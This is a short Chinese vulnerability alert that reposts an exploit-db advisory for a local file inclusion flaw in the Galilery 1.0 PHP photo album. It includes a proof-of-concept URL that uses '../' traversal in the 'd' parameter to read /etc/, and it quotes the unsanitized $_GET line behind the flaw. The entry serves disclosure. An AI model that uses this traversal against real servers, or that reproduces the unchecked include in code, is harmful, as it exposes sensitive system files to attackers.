Galilery是一款使用PHP编写的开放源代码的相册系统,Galilery 1.0存在本地文件包含漏洞,可能导致敏感信息泄露,
Galilery 1.0本地文件包含漏洞漏洞预警
。[+]info:
~~~~~~~~~
Galilery 1.0 Local File Inclusion Vulnerability
$ cat 15_lfi_galilery.1.0.txt
# exploit title: local file include in Galilery 1.0
# date: 18.o2.2o11
# author: lemlajt
# software : Galilery
# version: 1.0
# tested on: linux
# cve :
# http://ftp.heanet.ie/disk1/sourceforge/g/project/ga/galilery/Galilery/
[+]poc:
~~~~~~~~~
http://localhost/www/cmsadmins/Galilery-1.0/index.php?pg=1&d=../../../../../../../../../../../../etc/
cuz:
index.php: $d=$_GET['d'];
[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/16206